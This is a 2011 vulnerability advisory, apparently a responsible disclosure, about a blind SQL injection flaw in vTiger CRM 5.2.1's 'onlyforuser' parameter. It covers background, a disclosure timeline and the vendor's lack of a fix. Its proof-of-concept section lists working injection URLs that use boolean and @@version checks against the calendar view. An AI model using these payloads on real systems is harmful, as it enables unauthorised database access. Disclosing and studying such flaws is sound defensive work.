vTiger CRM 5.2.1 Blind SQL Injection

`vTiger CRM 5.2.x <= Blind SQL Injection Vulnerability  
  
  
  
1. OVERVIEW  
  
The vTiger CRM 5.2.1 and lower versions are vulnerable to Blind SQL  
Injection. No fixed version has been released as of 2011-10-05.  
  
  
2. BACKGROUND  
  
vtiger CRM is a free, full-featured, 100% Open Source CRM software  
ideal for small and medium businesses, with low-cost product support  
available to production users that need reliable support. vtiger CRM  
is a widely used product with thousands of users in dozens of  
countries. It has a vibrant community of users driving the product  
forward, and contributing to it's development. Over 2 million copies  
of vtiger CRM have been downloaded so far. It was launched as a fork  
of version 1.0 of the SugarCRM project launched on December 31st,  
2004.  
  
  
3. VULNERABILITY DESCRIPTION  
  
The "onlyforuser" parameter was not properly sanitized, which allows  
attacker to conduct Blind SQL Injection Attack. This could an attacker  
to inject or manipulate SQL queries in the back-end database, allowing  
for the manipulation or disclosure of arbitrary data.  
  
  
4. VERSIONS AFFECTED  
  
Tested on 5.2.1  
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
A future calendar event must be created in advance to trigger this  
vulnerability.  
  
Verified with Simple 1=1 Boolean check  
-----------------------------------------------------  
  
/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d1--  
  
/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d2--  
  
  
Verified with MySQL @@version check  
-----------------------------------------------------  
  
/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5--  
  
/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4--  
  
  
6. SOLUTION  
  
No patched version is available yet.  
The vendor hasn't attempted to fix the issues though they acknowledged  
the report.  
  
  
7. VENDOR  
  
vTiger Development Team  
http://www.vtiger.com/  
  
  
8. CREDIT  
  
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN  
Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2010-12-08: notified vendor  
2011-10-05: no fixed version released yet  
2011-10-05: vulnerability disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_blind_sqlin  
Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM  
  
  
#yehg [2011-10-05]  
`